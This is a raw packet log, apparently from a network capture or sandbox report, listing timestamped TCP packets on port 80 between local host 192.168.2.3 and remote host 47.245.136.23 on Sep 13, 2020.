Sep 13, 2020 20:55:13.328476906 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328501940 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328506947 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.328522921 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328542948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328571081 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328593969 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328603029 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.328618050 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328653097 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328677893 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328712940 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328718901 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.328736067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328777075 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328814030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328826904 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.328839064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328866005 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328892946 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328910112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328918934 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.328921080 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328929901 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328938007 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328948021 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328958035 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328969955 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328979969 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328991890 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329005003 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329015970 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329029083 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329040051 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329051971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329063892 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329067945 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.329075098 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329085112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329094887 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329106092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329117060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329128981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329140902 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329153061 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329165936 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329176903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329186916 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329197884 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329210997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329215050 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.329221964 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.329310894 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.512800932 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.517222881 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.536935091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.536952019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.536966085 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.536977053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.536984921 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.536995888 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.537002087 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.537009001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.537014961 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.537020922 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.537026882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.537048101 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.537197113 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.541430950 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541448116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541456938 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541466951 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541557074 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541579962 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541584969 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.541594028 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541605949 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541619062 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541635036 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541651011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541665077 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541677952 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541691065 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541704893 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541711092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541727066 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541742086 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541753054 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541766882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541783094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541788101 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.541821003 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541842937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541861057 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541874886 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541892052 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541906118 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541922092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541929007 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541945934 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541958094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541965008 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541976929 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541984081 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541990042 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.541999102 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542010069 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542018890 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542032003 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542048931 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542062998 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542074919 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542084932 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.542088985 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542102098 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542108059 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542114019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542119980 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542228937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542248964 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542287111 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542292118 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.542315006 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542326927 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542339087 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542359114 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542372942 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542385101 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542397022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542407990 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542421103 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542433977 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542448997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542460918 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542470932 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542479038 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.542483091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542490959 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542501926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542514086 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542525053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542536974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542550087 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542556047 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542571068 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542582989 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542599916 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542613029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542624950 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542629957 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.542637110 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542649031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542661905 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542679071 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542695045 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542707920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542721033 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542721987 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.542728901 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542741060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542753935 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542772055 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542798042 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542829990 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542843103 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542850018 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542862892 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542866945 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.542879105 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542896032 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542905092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542916059 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542927980 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542948961 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542960882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542973995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542985916 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542998075 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.542999983 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.543009996 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543021917 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543032885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543045044 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543051004 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543057919 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543068886 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543076038 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543081999 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543087959 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543093920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543106079 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543112993 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543123960 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543133020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543138027 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.543157101 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543188095 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543205976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543220043 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543226004 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543231964 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.543240070 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.543335915 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.561153889 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561161995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561170101 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561193943 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561225891 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561239958 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561254025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561261892 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561265945 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.561332941 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561341047 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561352968 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561361074 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.561438084 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.565928936 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.565938950 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.565956116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.565968990 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.565984011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566004038 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566018105 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566025019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566030979 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566037893 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566046000 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566096067 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.566194057 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566209078 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566220999 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566236973 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566270113 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566289902 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566319942 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566327095 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566344976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566379070 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566405058 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566421986 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566425085 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.566435099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566447020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566458941 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566473007 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566488981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566499949 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566505909 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566512108 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566519022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566524982 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566530943 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566536903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566543102 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566549063 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566726923 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.566780090 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566792011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566804886 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566817999 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566831112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566838980 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566939116 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.566939116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.566952944 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567039013 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567068100 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567074060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567080021 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567084074 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.567086935 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567092896 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567099094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567116976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567127943 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567169905 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567214966 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567223072 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567234039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567241907 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567248106 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567255020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567262888 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567280054 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567292929 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567306995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567322969 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567337990 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567351103 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567367077 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567368031 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.567378998 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567390919 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567403078 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567416906 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567424059 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567447901 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567471981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567492008 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567500114 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567528963 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567544937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567564011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567576885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567594051 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567610025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567624092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567631960 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567645073 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567652941 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567661047 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567682981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567708015 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567718029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.567722082 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.567926884 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.898422956 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.902710915 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:14.204989910 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:14.228701115 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:17.848124027 CEST	49724	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:17.871401072 CEST	80	49724	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:17.871542931 CEST	49724	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:17.872457027 CEST	49724	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:17.872736931 CEST	49724	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:17.872745991 CEST	49724	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:17.896034956 CEST	80	49724	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:17.896353960 CEST	80	49724	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:18.051340103 CEST	80	49724	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:18.051357985 CEST	80	49724	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:18.051532984 CEST	49724	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:18.052040100 CEST	49724	80	192.168.2.3	47.245.136.23
